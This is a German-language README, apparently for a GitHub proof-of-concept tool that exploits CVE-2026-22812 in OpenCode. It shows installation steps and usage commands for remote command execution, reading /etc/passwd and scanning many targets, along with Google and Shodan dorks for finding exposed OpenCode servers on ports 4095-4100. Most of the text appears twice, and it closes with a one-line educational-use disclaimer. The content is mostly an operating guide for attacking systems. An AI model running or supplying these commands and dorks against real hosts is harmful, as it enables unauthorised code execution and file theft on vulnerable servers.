
Python-Tool zur Überprüfung und Ausnutzung von CVE-2026-22812 in OpenCode, mit Unterstützung für Befehlsausführung, Dateilesen und Multi-Ziel-Scans auf den Ports 4095-4100.
OpenCode CVE-2026-22812 Exploiter Einfache Python-Tools zum Prüfen und Ausnutzen der OpenCode-Schwachstelle (CVE-2026-22812).
Installation
git clone https://github.com/CayberMods/CVE-2026-22812-POC.git
cd CVE-2026-22812-POC
pip install requests urllib3 argparse concurrent-log-handler colorama
Grundlegende Verwendung
# Einzelnes Ziel prüfen
python rce.py -u http://target:4096 --check
# Befehl ausführen
python rce.py -u http://target:4096 -c "whoami"
# Datei lesen
python rce.py -u http://target:4096 --read-file /etc/passwd
# Mehrere Ziele scannen
python rce.py -l targets.txt --check
# Weitere Optionen
python rce.py --help
Such-Dorks
Google: intitle:"OpenCode" "Login"
Shodan: port:"4095-4100" http.component:"OpenCode"
Standard-Ports: 4095-4100
Einfache Python-Tools zum Prüfen und Ausnutzen der OpenCode-Schwachstelle (CVE-2026-22812).
Installation:
git clone https://github.com/CayberMods/CVE-2026-22812-POC.git
cd CVE-2026-22812-POC
pip install requests urllib3 argparse concurrent-log-handler colorama
Grundlegende Verwendung
# Einzelnes Ziel prüfen
python rce.py -u http://target:4096 --check
# Befehl ausführen
python rce.py -u http://target:4096 -c "whoami"
# Datei lesen
python rce.py -u http://target:4096 --read-file /etc/passwd
# Mehrere Ziele scannen
python rce.py -l targets.txt --check
# Weitere Optionen
Such-Dorks:
Google: intitle:"OpenCode" "Login"
Shodan: port:"4095-4100" http.component:"OpenCode"
Standard-Ports: 4095-4100
Hinweis Nur für Bildungszwecke/autorisierte Tests.